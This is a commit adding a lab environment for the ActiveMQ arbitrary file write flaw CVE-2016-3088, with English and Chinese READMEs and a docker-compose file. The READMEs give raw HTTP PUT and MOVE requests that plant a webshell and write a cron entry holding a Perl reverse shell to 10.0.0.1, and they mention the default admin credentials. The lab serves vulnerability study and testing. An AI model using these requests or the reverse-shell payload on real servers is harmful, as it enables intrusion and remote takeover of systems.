first commit

activemq/CVE-2016-3088/README.md

@@ -0,0 +1,124 @@
+# ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+## Environment setup
+
+Enter following commands to build and run the vulnerability environment:
+
+```
+docker compose up -d
+```
+
+The environment listens to port 61616 and port 8161, of which 8161 is the web console port. This vulnerability appears in the web console.
+
+Visit `http://your-ip:8161/` to see the web page, indicating that the environment has been successfully run.
+
+## Background brief
+
+ActiveMQ web console is divided into three applications, admin, api and fileserver, where admin is the administrator page, api is the interface, fileserver is the interface for storing files; admin and api need to log in before they can be used, fileserver does not need to log in.
+
+fileserver is a RESTful API interface. We can read and write files stored in it through HTTP requests such as GET, PUT, and DELETE. The design purpose is to compensate for the defect that the message queue operation cannot transfer and store binary files, but later found that:
+
+1. Its usage rate is not high
+2. File operations are prone to vulnerabilities
+
+Therefore, ActiveMQ has closed the fileserver application by default in 5.12.x~5.13.x (you can open it in conf/jetty.xml); after 5.14.0, the fileserver application is completely removed.
+
+In the test process, you should pay attention to the version of ActiveMQ, prevent useless effort.
+
+## Vulnerability Details
+
+This vulnerability appears in the Fileserver application, the vulnerability principle is actually very simple, that is, fileserver support to write files (but do not parse the JSP), while supporting the move file (MOVE request). So, we just need to write a file and then move it to any location by use a move request, causing arbitrary file write vulnerability.
+
+Write files such as cron or ssh key
+
+1. Write Webshell
+2. Write files such as cron or ssh key
+3. Write libraries and configuration files such as jar or jetty.xml
+
+The advantage of writing webshell is convenient, but the fileserver don't parse jsp, admin and api both need to log in to access, so it is a bit futile; The advantage of writing cron or ssh key is to directly reverse Shell, it is convenient too, the disadvantage is that you need root privileges; write jar, a little trouble (requires jar back door), write xml configuration file, this method is more reliable, but there is a futile point: we need to know ActiveMQ absolute path.
+
+Let we talk about the above several methods.
+
+### Write Webshell
+
+As I said earlier, the Webshell needs to be written in the Admin or Api app, and both applications need to be logged in to access.
+
+The default ActiveMQ account and password is `admin`. First, visit `http://your-ip:8161/admin/test/systemProperties.jsp` to view the absolute path of ActiveMQ:
+
+![](02.png)
+
+Then upload Webshell:
+
+```
+PUT /fileserver/2.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 120976
+
+webshell...
+```
+
+Then move it to the API folder (`/opt/activemq/webapps/api/s.jsp`) in the Web directory:
+
+```
+MOVE /fileserver/2.txt HTTP/1.1
+Destination: file:///opt/activemq/webapps/api/s.jsp
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+```
+
+Access Webshell (login required):
+
+![](03.png)
+
+### Write crontab, automate reverse shell
+
+This is a relatively stable method. First upload the cron configuration file (note that the newline must be `\n`, not `\r\n`, otherwise the crontab execution will fail):
+
+```
+PUT /fileserver/1.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 248
+
+*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+Move it to `/etc/cron.d/root`:
+
+```
+MOVE /fileserver/1.txt HTTP/1.1
+Destination: file:///etc/cron.d/root
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+```
+
+If both of the above requests return 204, the write is successful. Waiting for the reverse shell:
+
+![](01.png)
+
+This method requires the ActiveMQ run as root, otherwise it will not be able to write to the cron file.
+
+### Write jetty.xml or jar
+
+In theory we can override jetty.xml, remove the login restrictions for admin and api, and then write webshell.
+
+In some cases, the owner of jetty.xml and jar is the user of the web container, so the success rate of writing crontab is higher.
+
+Not tested yet.

activemq/CVE-2016-3088/README.zh-cn.md

@@ -0,0 +1,127 @@
+# ActiveMQ任意文件写入漏洞（CVE-2016-3088）
+
+## 环境搭建
+
+搭建及运行漏洞环境：
+
+```
+docker compose build
+docker compose up -d
+```
+
+环境监听61616端口和8161端口，其中8161为web控制台端口，本漏洞就出现在web控制台中。
+
+访问`http://your-ip:8161/`看到web页面，说明环境已成功运行。
+
+## 背景简述
+
+ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
+
+fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：
+
+1. 其使用率并不高
+2. 文件操作容易出现漏洞
+
+所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。
+
+在测试过程中，可以关注ActiveMQ的版本，避免走弯路。
+
+## 漏洞详情
+
+本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。
+
+文件写入有几种利用方法：
+
+1. 写入webshell
+2. 写入cron或ssh key等文件
+3. 写入jar或jetty.xml等库和配置文件
+
+写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。
+
+分别说一下上述几种利用方法。
+
+### 写入webshell
+
+前面说了，写入webshell，需要写在admin或api应用中，而这俩应用都需要登录才能访问。
+
+默认的ActiveMQ账号密码均为`admin`，首先访问`http://your-ip:8161/admin/test/systemProperties.jsp`，查看ActiveMQ的绝对路径：
+
+![](02.png)
+
+然后上传webshell：
+
+```
+PUT /fileserver/2.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 120976
+
+webshell...
+```
+
+移动到web目录下的api文件夹（`/opt/activemq/webapps/api/s.jsp`）中：
+
+```
+MOVE /fileserver/2.txt HTTP/1.1
+Destination: file:///opt/activemq/webapps/api/s.jsp
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+
+
+```
+
+访问webshell（需要登录）：
+
+![](03.png)
+
+### 写入crontab，自动化弹shell
+
+这是一个比较稳健的方法。首先上传cron配置文件（注意，换行一定要`\n`，不能是`\r\n`，否则crontab执行会失败）：
+
+```
+PUT /fileserver/1.txt HTTP/1.1
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 248
+
+*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+```
+
+将其移动到`/etc/cron.d/root`：
+
+```
+MOVE /fileserver/1.txt HTTP/1.1
+Destination: file:///etc/cron.d/root
+Host: localhost:8161
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Content-Length: 0
+
+
+```
+
+如果上述两个请求都返回204了，说明写入成功。等待反弹shell：
+
+![](01.png)
+
+这个方法需要ActiveMQ是root运行，否则也不能写入cron文件。
+
+### 写入jetty.xml或jar
+
+理论上我们可以覆盖jetty.xml，将admin和api的登录限制去掉，然后再写入webshell。
+
+有的情况下，jetty.xml和jar的所有人是web容器的用户，所以相比起来，写入crontab成功率更高一点。
+
+尚未测试。

activemq/CVE-2016-3088/docker-compose.yml

@@ -0,0 +1,7 @@
+version: '2'
+services:
+ activemq:
+   image: vulhub/activemq:5.11.1-with-cron
+   ports:
+    - "61616:61616"
+    - "8161:8161"